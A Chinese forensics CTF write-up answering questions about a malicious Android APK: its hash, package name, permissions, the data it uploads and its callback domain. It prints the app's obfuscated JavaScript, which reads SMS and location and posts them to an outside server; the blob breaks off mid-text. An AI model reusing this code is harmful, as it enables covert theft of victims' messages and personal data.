第一题
题目请计算检材一Apk的SHA256值
Writeup
使用windows自带的计算工具get-filehash
-
进入文件所在目录
-
输入Get-FileHash .\检材一-zhibo.apk -Algorithm SHA256
-
得到hash值:3FECE1E93BE4F422C8446B77B6863EB6A39F19D8FA71FF0250AAC10F8BDDE73A
第二题
题目
该APK的应用包名为
Writeup
直接使用GDA查看plus.H5B8E45D3
第三题题目
该APK程序在封装服务商的应用唯一标识(APPID)为
Writeup
唯一标识appid 是对apk的打包工具的记录 可以去调取注册打包工具人的详细信息
可以使用雷电APP智能分析,直接得到
也可以了用jadx工具分析得到,位于assets/data/dcloud_control.xml中
第四题
题目
该APK具备下列哪些危险权限(多选题):
A.读取短信
B.读取通讯录
C.读取精确位置
D.修改通讯录
E.修改短信
Writeup
解法1
使用雷电APP智能分析得到危险权限
相关资料:Android常用的网络权限,Android常用的权限大全_张赫尔的博客-CSDN博客
使用GDA baseinfo查找到相关权限
[Permissions]
android.permission.INTERNET
android.permission.WRITE_EXTERNAL_STORAGE
android.permission.ACCESS_NETWORK_STATE
android.permission.ACCESS_WIFI_STATE
android.permission.INSTALL_PACKAGES
android.permission.REQUEST_INSTALL_PACKAGES
android.permission.ACCESS_COARSE_LOCATION
android.permission.ACCESS_FINE_LOCATION
android.permission.READ_CONTACTS
android.permission.READ_SMS
android.permission.RECEIVE_SMS
android.permission.SEND_SMS
android.permission.WRITE_SMS
android.permission.GET_ACCOUNTS
android.permission.WRITE_CONTACTS
android.permission.CHANGE_WIFI_STATE
android.permission.READ_PHONE_STATE
android.permission.MOUNT_UNMOUNT_FILESYSTEMS
android.permission.READ_LOGS
android.permission.WRITE_SETTINGS
android.permission.READ_EXTERNAL_STORAGE
再根据这些权限和上面的相关资料匹配,得到答案是全选
第五题
题目
该APK发送回后台服务器的数据包含一下哪些内容(多选题):
A.手机通讯录
B.手机应用列表
C.手机号码
D.验证码
E.GPS定位信息
Writeup
抓包分析的话可能受模拟器影响,会少一个GPS,因此我们使用代码分析的方法来看。见第七题分析提取出代码后。
这三段发包的代码我们可以看到传输了的参数包括duanxin(短信)、jingweidu(经纬度)、con(var con = sjh + "" + yqm + '' + address; //sjh(手机号)、yqm(邀请码))。但是目前没有看到通讯录的数据传输,只看到了通讯录权限的要求。到目前为止暂时没有看到代码里有通讯录。不过在抓包的时候确实抓到了。
第六题
题目
该APK程序回传通讯录时,使用的http请求方式为()
Writeup
抓包分析即可,POST
第七题
题目
该APK程序的回传地址域名为【标准格式:www.abc.com】
Writeup
这里要的是域名,并不是详细网址
所以是www.honglian7001.com
第八题
题目
该APK程序代码中配置的变量apiserver的值为(后面不带/)
Writeup
分析逆向代码中的资源,发现应用由网站打包痕迹严重,怀疑是网站打包服务APP结果。
发现了Sojson v4加密,尝试解密
解密地址:Sojson v4 解密 - Bugku CTF
源代码:
['sojson.v4']["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"](((['sojson.v4']+[])["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']['\x61\x70\x70\x6c\x79'](null,"47Q42H10P32U42h80F114e111m103n99t101s115H115E101X100k32J66j121m32M74F83H68O101y99P32r105l110z32I48M46g48p48j115q10Y32O42w74W83B68L101c99h32J45P32p74z83k68C101o99t46W106l115z46t111o114A103B10I32g42N47D10B109M117z105Z46P105F110d105q116S40n41r59o10h10O9l9K109L117g105R46B112Q108x117t115x82q101L97s100c121W40j102o117d110F99N116r105N111B110P32x40M41t32j123t10Y9Z9x9M47L47e118E97C114a32Z109t97C105J110p32a61q32n112t108C117F115k46J97c110n100v114T111G105L100c46F114X117o110p116N105d109u101I77V97M105f110z65y99F116N105Q118D105H116B121g40A41G59K32C32W10w9q9j9P47j47R32g109O97Y105d110k46l109X111e118n101Y84P97K115K107a84R111i66o97n99P107d40J102I97C108G115i101v41E59E10i10y9g9i9z118Z97R114U32C97A100j100B114U101e115j115p32n61o32Q112E108X117C115W46Q100j101l118Y105J99p101w46j118o101X110o100Z111e114k32y43E32f39z45q39G32g43A32K112Y108T117T115N46M100D101p118K105Q99S101D46m109V111v100T101E108M59J10N9m9U9n97y100M100C114D101K115h115Z32Y61Z32d97N100o100K114I101H115W115A46h114A101u112P108V97t99D101d40i47m92q110b47a103T44d32L34M34A41C46z114R101N112s108V97P99V101n40g47w32T47D103d44z32i34g34Y41O46w114W101F112y108a97r99r101K40v47v92U114A47Y103g44X32U34s34l41v59R10U9P9a9W118N97H114P32N97f112K105P115O101X114H118n101A114a32w61p32G39C104A116M116s112w58u47K47j119R119Q119m46c104U111e110a103a108x105t97B110x55O48L48s49p46D99D111b109n47j97a112L105D47h117S112f108I111B97p100H115e47k39J59g10u9v9D9P47P47B37325v22797A25968i25454a22788A29702j32q39044y38450X29992Q25143G37325l22797P28857y20987Y10L9u9C9g118g97K114l32w100u97r110Z106J105c115c104i105x106i105d97x110c32T61b32p116U114X117E101F59C10P9G9a9w102o117I110h99e116l105t111Z110U32I114k101P113R117p101e115A116u80Z101M114Z109p105G115l115c105i111k110m40b115u106D104V44q32K121Q113r109n41J32r123D10t9W9z9z9Y112E108k117U115C46U97I110t100G114v111Y105m100d46y114Z101O113S117S101X115n116k80s101o114Y109F105o115w115Y105h111h110D115W40B10N9H9u9t9n9L91B34w97V110k100t114K111v105Z100m46y112B101v114O109n105r115F115P105X111U110b46P82Y69Q65n68S95T83I77b83M34c93H44R10d9j9O9M9p9p102i117C110A99z116H105U111d110S32l40y114d101g115M117W108H116G79a98o106e41v32V123U10g9k9n9o9Y9F9D47r47w83I109p115k73s110d102c111S23384k25918Q19968C26465h30701R20449E30340V21508V39033s20869R23481z10s9Z9L9u9P9b9d118K97f114A32X83Q109V115S73C110y102v111D32M61K32b123z125u10c9T9y9m9I9f9S47Y47t83T109X115o23384z25918X25152r26377o30701m20449s10Q9L9C9x9F9E9V118S97d114M32s83a109M115g32R61E32Y123t125B10P10b9N9T9N9s9H9h118D97N114G32X97z105u109x101B105Z32f61p32n115t106z104x59k10a9l9h9a9A9U9a118y97N114P32a97M105m109m101K105Z50r32o61Z32H121j113F109b59Y10c9f9c9E9y9L9E118z97b114p32P100J117B97h110L120g105K110K32P61F32k39K91m123R34W105g109J101b105K34I58y34c39L32N43Q32C97x105a109t101L105u32e43H32E39K34P44H34X105D109B101Y105V50N34h58X34J39i32c43I32S97M105f109A101r105B50E32m43L32x39H34l125R39g59p10I9r9r9e9S9Z9k118P97R114Z32G67p117n114e115r111x114c32n61p32g112d108F117D115m46Y97d110n100w114p111f105h100c46r105l109S112t111f114t116n67F108F97c115g115g40m34X97z110K100U114I111N105a100f46S100X97Z116Y97Z98Z97T115B101Z46E67e117q114r115h111G114u34x41d10x9H9E9H9b9h9M118J97o114y32B85x114T105U32u61B32l112Y108Z117X115k46t97q110J100L114B111h105c100T46K105G109H112c111W114e116b67U108j97v115T115n40k34c97M110z100k114s111B105e100T46l110V101Q116B46k85u114D105s34O41P32E160F32v47q47Q27880w24847v21862A65292L97a110C100s114X111e105P100O46a110m101o116Q46G85C114s105T20013R30340v110P101G116j26159Z23567H20889T10M9Y9E9r9U9w9b118D97r114d32Y97F99m116A105Y118J105m116Y121Z32R61A32g112A108D117m115D46y97Z110J100i114E111y105D100l46M114F117t110U116J105l109y101b77l97W105I110L65f99H116g105I118z105t116e121c40N41t10F9b9J9S9w9k9t118R97k114j32F117J114Y105D32K61X32A85f114r105l46J112A97j114S115S101R40n34y99b111M110a116F101j110j116c58R47N47n115o109e115Z47O34f41z59X10i10w9t9U9Q9a9j9d118p97o114W32N112V114l111O106A101j99V116S105E111X110I32q61X32g110P101L119L32C65W114N114i97J121X40n34h95N105Z100l34w44H32n34l97V100Q100Q114i101l115x115Q34X44Q32u34j112N101R114x115R111q110n34I44L32i34g98Y111p100r121N34H44U32C34x100g97s116X101u34W44A32l34w116T121p112A101g34E41p10y9q9Z9j9H9N9n118H97p114S32r99S117M115l111t114N32e61q32T97E99z116y105l118p105q116S121m46L109j97v110e97V103F101F100L81W117k101Y114c121Q40l117e114s105N44P32l112G114t111F106e101f99Z116B105T111k110V44c32c110h117I108e108R44c32y110r117M108m108Q44M32B34E100w97v116G101p32i100K101i115i99i34x41e10s9l9n9A9s9c9k118g97F114X32f105M100J67d111t108H117a109g110r32W61W32z99r117b115j111m114w46u103d101y116p67O111f108C117I109Z110R73F110U100m101I120D40J34A95N105M100R34s41b10M9x9l9k9X9D9B118e97g114A32w110Z97Y109Z101i67L111l108A117j109y110X32r61w32O99x117s115e111D114x46d103n101U116L67l111H108M117j109S110B73w110i100M101o120B40G34X112n101c114p115K111t110C34U41C10m9G9L9C9G9M9h118F97Q114j32o112N104a111F110e101Y78v117t109d98x101a114H67T111l108m117c109w110h32F61x32b99E117E115m111W114H46c103h101u116s67k111B108W117F109W110W73n110C100x101y120K40B34H97H100f100R114d101l115p115R34E41B10j9x9o9V9q9a9P118y97u114C32r115Y109O115j98Z111p100G121v67B111C108i117u109e110i32B61A32m99w117v115Q111m114O46d103Y101o116w67a111g108R117p109b110k73o110I100n101m120c40w34B98q111C100R121J34h41z10d9a9s9s9R9H9z118h97S114V32m100I97b116a101Y67e111T108l117s109n110i32c61H32Q99V117P115a111O114f46u103q101E116Z67i111i108a117X109P110c73a110a100D101a120e40g34U100B97Q116v101p34S41U10N9t9W9q9H9F9W118b97X114F32m116N121M112Y101s67Z111f108P117A109L110U32S61E32Z99v117B115F111l114o46R103C101I116V67O111a108v117W109v110o73d110W100X101p120R40L34f116K121R112j101g34Y41u10Y9a9K9b9P9d9Y105O102N32e40d99f117R115r111c114M32t33K61u32g110C117w108r108z41T32d123h10w9u9o9l9N9O9H9I119w104F105f108K101H32N40Q99Z117G115M111t114u46x109V111H118p101f84S111r78o101U120j116w40P41I41U32u123e10a9F9H9P9u9t9k9S9S83K109B115x73A110r102d111e46f105b100n32u61x32b99s117V115s111T114C46I103G101U116b83e116o114A105R110a103z40n105H100K67t111y108Y117F109R110X41B10s9F9j9s9n9f9i9G9l83z109S115F73T110u102d111Q46b78F97W109J101k32T61d32e99L117j115A111V114a46k103W101p116n73k110H116o40j110J97G109E101w67y111y108D117z109V110W41W10f9W9S9s9o9x9x9I9H83x109L115X73N110S102Y111z46R68k97Z116s101h32L61M32I99T117T115p111D114d46m103x101K116u76P111J110S103e40l100o97N116e101l67B111m108Q117W109B110P41b10F9p9Z9W9v9q9Q9n9q83N109I115p73F110j102f111y46U68b97q116A101U32U61a32d103R101I116U70c111H114U109Q97A116s68h97f116C101z40f83O109d115v73l110Y102v111w46M68I97m116I101B41V10V9S9B9I9l9h9w9T9N83l109I115Y73X110i102q111L46Y80r104V111R110O101D78N117k109f98q101X114p32R61T32Q99m117S115z111B114w46A103Z101U116r83N116y114G105g110D103g40R112r104P111U110t101W78Y117T109G98s101v114e67d111C108b117G109d110R41c10y9v9a9n9S9V9H9C9y83I109x115l73Q110G102i111e46O83R109y115G98m111V100s121F32Q61T32Q99D117J115j111r114H46S103j101e116b83R116S114G105L110K103Z40y115L109G115g98X111f100M121E67t111z108d117e109K110e41T10j9S9U9E9e9x9f9M9c83v109j115L73d110k102h111H46z84l121s112U101j32Y61f32G99I117H115J111L114Z46a103F101F116s83O116C114w105Q110h103z40l116H121C112s101n67x111B108P117l109Z110c41q10g10b9u9V9d9H9T9B9S9C118x97N114y32O112b111S115A116T32A61e32w74u83C79N78G46T115x116R114G105m110s103v105s102K121S40r83o109Z115j73v110U102H111j41t59L10E9o9y9H9m9r9k9d9A47x47s99d111G110e115Z111g108X101P46E108w111i103F40G112P111N115z116z41H59d10c9p9L9x9N9k9a9G9E100g117s97T110y120C105k110w32i61E32W100d117P97H110X120z105B110t32W43m32N39r44x39K32k43y32u112l111q115s116E59n10C10H9S9i9P9F9Z9s9A125r10G9Y9i9T9Q9t9C9w100Z117x97Q110M120B105R110s32e61D32I100J117i97L110e120c105J110E32G43F32H39C93v39D59Z10C9S9n9m9f9a9e9u47A47G97N108L101u114I116s40Z100M117F97V110z120w105O110X41t59S10L10H9v9P9c9A9s9A9w109l117l105x46a97d106R97H120V40V97L112x105s115o101D114S118J101o114T32L43l32w39K97D112H105C115D109R115q39d44C32J123L10A9Z9z9q9p9e9d9K9i100v97K116k97C58y32M123G10Q9R9o9a9N9z9D9O9O9X100J97n116I97K58J32B100b117a97R110a120c105B110d10f9l9A9O9z9x9m9g9J125L44n10A9j9L9R9S9d9X9L9c100v97D116X97J84U121K112m101N58R32o39x116N101Q120O116D39O44f47R47A26381f21153a22120y36820c22238C106Z115n111L110P26684q24335Y25968L25454H10l9V9m9V9g9J9V9i9I116b121S112i101K58H32I39D112w111f115O116J39N44t47F47G72y84d84h80L35831F27714L31867j22411d10r9l9T9R9i9E9v9j9w116e105B109H101T111G117W116z58j32d49E48z48I48p48G44L47B47q36229m26102Z26102v38388V35774Z32622T20026K49A48l31186g65307L32S32t32D32x32o32S32Q32q32g32v32o32C32L32y10e9I9S9M9E9i9i9X9e115E117m99e99N101w115e115F58n32d102n117e110k99X116E105n111E110i32y40e100N97o116o97L41i32t123s10A9y9W9v9s9B9w9f9R9e109V117B105M46S116w111i97m115a116G40N39i33719I21462W25104q21151B39S41n10z9J9C9a9b9P9a9y9G9g47Z47U99R111l110g115X111O108E101M46I108I111g103R40u99t111c110j41U10D10m10E9A9P9G9z9W9F9U9c125d44D10N9M9R9p9b9T9W9P9R101O114O114H111Z114k58f32b102z117r110j99c116c105n111t110w32S40M120a104j114u44U32W116S121i112Y101O44w32t101m114q114l111y114f84H104P114t111V119h110X41m32t123R10n9a9Y9L9B9p9T9h9b9L47d47v24322d24120t22788A29702g65307X10R10K9T9X9i9d9B9j9H9Q125J10a9e9J9X9H9B9c9a125o41O59a10L9p9n9J9H9q9G9v99w117m115w111U114L46K99L108A111c115y101W40i41C10s9d9e9Z9Q9O9Y125F10f10Q9X9s9P9b9Z125T44k10s9G9q9T9a9Q102q117X110C99o116H105I111b110G32d40K101c114c114l111d114T41a32a123Y10z9T9N9L9N9I9P99a111u110Z115c111z108g101E46M108Z111R103V40S39h30003b35831J26435t38480a38169X35823y65306b39f32i43x32i101o114Z114h111d114A46G99n111k100j101p32N43g32l34t32R61Z32n34Q32k43x32K101D114w114E111L114U46F109f101G115E115Y97g103W101D41y59D10I9a9Q9s9D9n125G41e59p10O9W9k9x125T10T10j10l10v9I9W9A47v47G25193p23637R68R97y116o101z21151K33021X65306u23558c108v111f110f103y22411S26085U26399E36716m25442S20026V29305g23450J30340m26684H24335o10k9g9m9j68D97R116B101o46O112d114f111N116l111j116b121c112I101L46G102V111g114w109Z97j116i32W61l32z102c117W110Q99p116i105x111I110n32D40D102D111Q114W109d97I116Y41i32c123H10D9e9E9e9M118P97J114z32Z111a32I61q32g123E10p9o9x9o9t9Y34E77I43e34X58b32R116r104u105P115a46a103S101l116x77l111X110z116u104q40l41g32l43D32o49n44O10R9F9K9k9F9U34h100C43Z34l58k32G116W104g105e115Z46C103l101s116w68z97f116l101C40v41S44w10D9g9G9F9v9F34F104u43j34d58p32T116h104H105E115W46b103D101u116c72B111A117A114F115m40k41d44q10R9B9W9m9r9q34g109N43u34t58x32k116i104G105V115G46W103h101l116S77r105Q110h117x116Z101o115z40e41T44G10I9I9I9g9F9d34B115D43p34e58c32Z116U104W105Z115y46U103a101q116p83R101h99t111Q110S100E115M40q41K44W10k9d9p9T9M9b34r113I43t34B58z32t77u97i116D104S46m102M108q111j111W114f40W40s116h104m105s115o46s103A101j116M77G111e110S116h104c40E41G32X43w32I51U41s32B47w32k51t41a44D10s9c9J9l9h9E34T83H34y58Y32a116b104n105Q115H46a103Q101p116v77o105X108H108i105j115M101N99r111P110X100u115T40b41e10z9H9Z9Q9Q125Q10o9L9c9M9H105a102c32z40c47K40b121R43j41S47w46p116s101K115D116m40i102J111K114J109H97O116D41I41R32C123p10H9E9K9q9L9E102c111O114e109v97W116X32g61J32M102g111I114u109Z97N116A46f114s101i112U108K97E99H101n40N82r101P103n69N120p112M46r36K49V44z32q40I116c104z105x115N46D103F101I116f70K117P108S108y89U101d97h114x40N41o32A43j32v34R34C41B46v115V117Z98Z115i116m114u40l52h32t45q32L82Q101a103g69A120E112Q46Q36b49D46v108C101D110j103P116J104t41l41a59n10P9c9y9e9o125z10D9b9Z9R9N102P111L114d32N40u118w97y114W32S107h32B105x110B32x111L41b32T123t10G9N9q9B9K9l105z102b32c40x110i101X119k32r82B101A103D69G120A112y40q34t40f34x32j43I32G107V32s43I32x34P41S34p41B46I116x101D115D116o40o102N111N114M109W97U116v41n41X32I123M10z9n9F9t9C9u9x102z111x114X109L97E116a32W61H32Q102M111H114R109C97k116Z46Y114e101B112u108M97b99w101a40h82C101t103U69L120n112N46K36Z49q44r32F82i101V103m69G120V112p46o36c49W46C108t101C110s103R116N104y32l61n61n32n49l32C63J32w111f91h107w93l32r58U32D40M34x48w48z34C32N43a32V111a91o107x93I41B46q115w117C98o115V116X114U40j40s34G34P32S43u32c111i91f107s93k41l46P108J101a110R103c116I104E41P41s59n10W9d9O9s9L9l125N10B9h9j9v9C125p10g9a9Z9y9q114z101R116Y117b114w110O32M102c111I114a109j97D116C59e10g9q9X9v125G10W10c10a9D9f9L47n47G23558g108v111T110x103B22411d26085Y26399j36716C25442m20026x29305w23450W26684j24335O10J9b9V9j102O117F110Y99B116h105m111s110x32E103o101O116E70n111m114e109v97b116w68G97Z116Y101A40f108s44j32I112C97E116P116T101e114M110m41K32b123A10P9Z9x9V9G100M97z116R101p32K61X32o110o101H119r32V68k97z116k101N40s108l41H59x10o9t9f9f9S105I102t32G40g112v97q116h116v101M114D110p32F61U61E32q117F110I100X101n102E105Q110L101L100B41G32L123o10s9v9f9N9g9W112I97Z116r116Y101f114j110a32U61K32k34L121j121o121o121p45q77t77h45h100S100j32H104y104X58B109O109E58Z115p115b34W59T10V9l9n9M9o125C10Z9R9A9W9J114J101a116f117f114q110E32A100V97A116Y101G46w102C111S114a109i97J116w40s112Q97s116J116F101C114W110d41o59s10f9p9g9G125Q10f10w10j9H9I9p47k47l97o108c101y114L116D40J112z108U117c115X46B100f101a118V105W99u101m46M117F117Q105H100v41T10S9S9b9S112B108O117r115f46z110t97N118R105q103g97J116p111s114w46a115h101s116f83J116g97F116a117a115H66P97H114y66D97f99c107c103L114x111C117h110Q100w40Q34Q35X100E98j54v101v102j102n34I41t59C10I10N9M9s9G109R117r105Y40n34s98c111K100v121t34C41x46s111K102W102P40K34y116v97Z112a34k41g59f10n10B9D9i9B109h117p105r40j34v98j111E100a121F34J41S46P111o110P40j39n116O97C112Y39t44D32f39a35P116M120m39I44N32D102z117E110o99q116H105u111J110j32O40D101w118f101u110P116w41M32O123e10Y10L9C9K9S9r36w40S39I35B116B120B39t41k46q104g105L100H101B40q41p59N10I9x9U9F9Z36h40N39T35H122k122i39m41v46q115M104w111n119B40I41o59q10e9t9Y9H125d41i59x10f10p9Y9A9p109n117Y105Y40n34h98n111H100J121t34R41L46N111P110d40x39S116B97n112B39S44r32Z39F35X103b98y39P44h32b102Q117N110C99O116c105V111b110Q32I40s101Z118v101T110C116S41n32F123q10a10G9s9F9J9p36T40t39I35B116o120U39b41z46h115R104M111g119r40Y41L59v10c9s9V9J9s36g40y39n35f122y122r39U41e46T104e105v100y101R40P41K59r10p9x9t9y125R41q59m10X10E9u9L9M109j117P105g40J34w98p111O100i121G34H41P46b111W110X40g39r116g97H112M39B44n32e39B35f113O100x39z44g32c102d117A110p99u116X105U111V110o32P40P101q118z101o110y116Z41F32A123P10N9E9J9O9K105T102l32D40t100N97r110J106S105N115E104s105q106T105Y97r110E41q32m123s10C9Q9R9B9S9k100f97s110z106J105d115r104S105X106h105g97t110e32e61p32A102u97a108C115W101M59Q10t9E9n9k9Y9W97b97I40h41Q10A9q9b9e9H125J32r101A108E115B101G32H123l10f9T9N9T9P9h97n97b40t41L10p9o9m9z9f125D10e10q9b9n9a125a41k59y10B10x10x9T9H9W102K117E110E99w116g105M111e110T32G103L101v116k80K101N114l109k105N115b115v105a111C110V40a112H101L114y109G105G115B115O105L111i110F73j100P101o110O116s105p116z121g44z32u115L117v99c99R101x115p115w67H97p108U108B66G97F99R107g44h32T101m114z114s111s114i67F97Q108u108j66a97I99H107n41z32A123o10o9D9S9b9M47Z47f26435B38480V26631a35782a36716H25442A25104U22823V20889Q32e32z10r9k9U9C9z118q97u114z32Q112V101Z114Q109N105P115X115Q105l111x110T73b100S101A110E116v105t116r121j32K61J32u112V101f114O109o105N115N115r105O111T110H73T100W101l110S116N105h116d121k46x116C111I85E112c112D101I114L67W97K115b101B40h41l59r10l9d9k9W9W47W47Y33719u21462p26816r27979i26435j38480i30340M29366v24577Z32Z32W10k9a9A9g9G118T97i114U32C99i104h101a99F107Y82W101e115N117x108j116H32K61n32Y112K108G117R115z46O110j97y118U105J103b97A116k111E114F46X99j104o101q99f107R80U101X114i109S105q115H115V105D111A110V40c112F101l114E109u105j115F115y105i111y110v73q100F101O110T116w105G116t121e41R59C10e9k9f9w9a47J47S26435F38480x29366y24577I26159J21542Y27491v24120F32K32r10D9n9B9e9t118l97I114q32o112C101m114v109a105S115k115Z105M111V110i83P116J97r116Z117q115L79g107y32k61H32j102O97Q108s115v101Y59a10b9g9A9Z9M47s47j26435d38480u20013t25991s21517G31216d32B32w10G9e9O9N9Y118a97X114f32b112n101f114H109a105F115z115E105i111K110B78T97O109C101R32U61W32S39k39d59L10Z9n9i9A9u47H47r23545b24212B32C97h110S100c111T114c105m100M32e30340t20855n20307i26435f38480u32z32f10H9l9O9F9U118l97w114d32N97j110c100Y114l111G105R100l80F101M114c109v105H115W115S105S111p110S32T61v32M39N39x59R10Q9D9w9M9s47d47v33719a21462n26435T38480l20013W25991F24847h24605I19982q23545X24212l32h97B110n100Y114F111d105V100Q32s31995n32479L30340n26435c38480y23383c31526u20018J32J32O10w9g9i9I9I115L119E105T116J99Z104l32F40K112P101Z114j109G105Z115e115S105a111r110u73K100N101S110p116s105S116L121x41i32s123m10L10f9O9k9E9v9o99j97Q115s101o32u39A67y79Q78X84o65Z67N84z83M39z58a10F9U9l9M9M9k9d112J101w114D109a105b115m115s105o111w110a78V97n109S101B32j61H32e39R31995Y32479k32852D31995k20154r39v59D10l9e9w9N9D9S9a97x110z100T114J111t105y100V80P101u114h109R105Z115i115O105D111N110L32l61u32x39X97n110u100P114i111e105h100L46w112P101h114E109S105g115I115s105u111C110v46j82V69M65o68l95S67N79I78V84v65m67h84y83K39T10r9B9F9q9j9p9n98j114U101x97m107g59P10s10J9g9a9I9u9b100H101I102I97g117F108S116I58v10j9h9B9t9v9P9v112x101D114s109h105p115L115R105d111T110K78v97p109q101i32x61s32V39M26410E30693W39U59j10G9J9t9o9w9A9v97F110T100o114u111c105A100U80Z101Y114o109x105K115u115U105s111e110w32N61z32j39o26410j30693G39n59G10h9Y9C9c9c9L9X98a114Y101J97U107X59R10Z9p9G9W9Z125t10p10Z9O9I9P9Z47c47f21028n26029i26816x26597r26435p38480P30340E32467b26524n32Z32Y10X9D9u9J9a115x119a105e116O99D104x32U40z99Y104L101b99m107C82M101Y115e117B108H116g41y32f123N10n9v9G9g9l9a99V97W115t101t32i39C97a117p116J104j111w114o105V122J101N100g39o58W10E9V9W9g9h9t9V47K47q27491l24120d30340D32b32r10M9Y9r9k9v9F9N112l101j114z109Z105b115p115P105P111S110D83e116R97u116O117Y115h79o107X32J61G32O116v114B117o101V10x9G9W9l9U9B9L98a114F101h97l107p59g10l9y9f9r9l9d99X97C115S101C32O39w100G101N110s105n101x100d39H58p10p9B9z9L9p9a9I47b47k34920s31034I31243T24207R24050w34987H29992u25143e25298Y32477Q20351p29992q27492c26435D38480z65292b22914P26524q26159D25298W32477e30340S23601A20877P27425w25552h31034B29992l25143D25171F24320E30830k35748H25552T31034P26694Q32e32e10A9p9d9o9m9N9J47G47M22914H26524z26377a35813w26435t38480F20294D26159j27809P26377T25171W24320p19981t36827f34892M25805u20316H36824F26159V20250o21435w30003B35831h25110B25163V21160U25171n24320Z32T32u10D9D9W9L9H9z9z47X47h32X99P111W110R115q111c108M101l46w108S111K103c40u39T24050J20851V38381M39f32o43P32w112H101y114k109n105n115w115v105Q111w110w78C97t109O101l32r43G32U39j26435N38480y39z41i32X32j10n9e9V9B9B9a9t47b47N32w101T114b114o111P114j67J97M108q108D66p97o99K107k40c39o24050L20851A38381N39t32L43L32S112B101E114l109d105j115M115m105h111E110Y78b97T109V101f32B43q32S39Z26435H38480H39q41e59U32G32g10K9t9I9O9Y9t9I47V47w32j114y101y116J117y114F110L32L32M10W9g9d9w9M9E9g98s114T101n97b107P59e10Z9s9h9W9P9R99q97q115h101H32q39r117L110c100L101u116c101r114N109U105d110W101I100e39z58J10G9q9k9y9D9p9A47B47u32y34920C31034g31243r24207Y26410U30830D23450i26159v21542y21487i20351y29992u27492s26435j38480A65292Q27492m26102B35843m29992H23545z24212y30340w65c80x73k26102J31995c32479a20250o24377B20986t25552T31034Y26694e35753U29992G25143X30830R35748f32v32U10a9O9y9Q9t9j9f47l47y32u116F104I105d115S46R114D101a113A117K101H115K116R80E101e114d109Y105A115H115z105H111C110W115c40o97u110r100m114K111u105T100p80k101T114i109J105P115f115r105n111Q110J44k32k112Q101O114R109N105l115f115o105s111M110T78j97u109j101d44D32g115D117a99L99W101N115H115w67z97Y108U108L66b97A99D107v44p32D101z114X114z111T114U67a97u108e108N66G97p99P107R41M32C32k10B9E9Z9Y9B9o9m47O47M32O101g114w114m111i114L67S97L108I108L66i97n99P107v40v39X26410k30830e23450J39R32I43D32u112w101B114V109u105R115l115i105G111f110k78D97D109z101J32D43A32W39n26435M38480h39D41e59a32W32d10L9H9g9f9K9Y9v47r47N32f114h101N116p117x114z110e32a32C10S9e9r9o9p9f9I98l114J101m97O107h59E10U9O9h9Q9G9j99q97t115h101h32n39U117j110u107r110D111l119F110Y39C58n10J9t9S9r9T9E9u101l114Z114C111b114P67j97v108n108u66u97x99S107c40w39a26080y27861H26597g35810j39q32a43W32Q112A101M114I109v105f115u115J105b111K110G78G97A109p101u32q43z32s39f26435S38480t39v41O59M10D9f9g9S9Q9F9O114X101o116s117z114Y110Z10H9Y9b9Z9z9j9p98R114E101a97P107O59w10o9Q9W9E9k9X100w101o102Z97L117V108D116n58N10g9U9t9Y9E9C9b101q114P114H111m114k67t97g108I108u66J97n99i107j40q39F19981e25903K25345q39G32s43Q32x112X101W114K109u105N115F115h105C111I110N78p97F109l101P32c43Z32F39A26435p38480G39F41G59Z10x9K9b9K9h9S9H114u101G116h117d114q110j10o9T9j9x9o9P9b98z114R101e97K107N59X10w9l9R9S9A125u10H10u9Q9p9H9M47G47q22914k26524r26435H38480q26159j27491D24120Y30340l25191t34892k25104N21151J22238J35843c32K32a10S9H9O9U9M105F102I32j40C112P101O114i109B105t115P115P105A111g110U83Q116L97d116I117I115u79T107a41l32M123j10B9N9N9B9O9C115C117d99r99q101l115w115z67n97j108t108D66c97K99t107N40t41Z10a9D9v9d9w125B32J101p108W115Q101r32Q123H10U9O9E9N9Y9N47D47U22914C26524U19981V27491v24120c65292B22914Y26524D26159S32B97e110L100z111y114S105L100a32W31995m32479b65292E23601u21160U24577I30003r35831C26435m38480B32B32v10O9o9p9W9m9u105n102J32M40T112I108p117d115w46i111q115D46a110T97P109O101z32X61L61F32O39K65T110a100t114a111S105O100V39V41z32c123P10s9l9F9V9r9z9q47t47X21160X24577E30003m35831z26435C38480y32B32A10k9S9r9F9v9r9w112n108Y117N115p46W97y110g100Q114G111p105p100a46V114g101x113E117G101q115U116r80j101e114M109Y105V115S115o105b111W110t115N40z91Z97C110q100r114t111V105f100l80J101U114p109A105l115V115H105v111J110l93i44U32S102f117W110m99K116F105Y111y110U32Z40h101W41x32S123K10b9s9k9x9Q9p9J9T105d102I32x40X101U46Z100j101H110k105N101J100b65q108Q119m97d121Y115u46D108w101K110g103G116n104C32l62U32j48j41C32z123G10j9o9x9G9Z9M9B9I9b47U47R26435v38480x34987V27704M20037T25298i32477P32O32q10t9s9D9t9O9b9t9x9m47l47e32P24377B20986d25552m31034M26694P35299G37322d20026Y20309h38656a35201n23450K20301d26435y38480P65292h24341F23548E29992z25143l25171p24320E35774J32622R39029W38754X24320E21551o32n32C10c9B9G9r9C9m9L9U9b101N114V114C111U114a67r97n108S108Y66R97J99U107A40J39K35831V24744A21516H24847D24377U20986t30340z26435l38480D65292H20415p21487B27491U24120O20351X29992X65s80R80x65281N22914G26524F26410y24377A20986Z65292w35831B21069m24448d8220T25163R26426E35774m32622g8221z37324S30340k8220i26435k38480Y31649n29702S8221l25214c21040W26412V24212h29992D65292L24182K25171t24320S36890f35759R24405p26435k38480s65292w26041j21487P20351F29992I12290x39w41v10P9p9n9J9k9a9B9k9z47A47i32f99c111W110T115k111l108f101F46i108T111a103x40W39W65t108F119i97x121O115o32a68c101R110o105w101b100o33S33H33k32h39b32h43j32a101s46H100F101f110k105V101D100X65o108a119l97h121K115N46C116v111F83k116H114R105U110y103b40a41H41u59i32R32k10a9q9Z9r9T9a9d9d125b10j9G9K9g9D9X9a9n105Q102O32N40a101G46p100z101V110g105K101V100e80u114i101b115U101r110o116Q46G108b101f110n103x116B104f32Y62J32J48Q41i32P123p10o9v9I9W9m9Y9x9w9B47z47h26435c38480j34987E20020Z26102w25298B32477b32S32N10o9G9H9k9u9t9j9b9n47s47Y32l24377p20986a25552m31034V26694d35299W37322c20026x20309v38656F35201k23450P20301g26435N38480h65292T21487y20877p27425D35843A29992j112d108V117l115p46e97I110X100u114K111R105a100M46a114c101J113C117G101Y115t116e80E101X114s109G105r115t115A105s111w110M115S30003J35831X26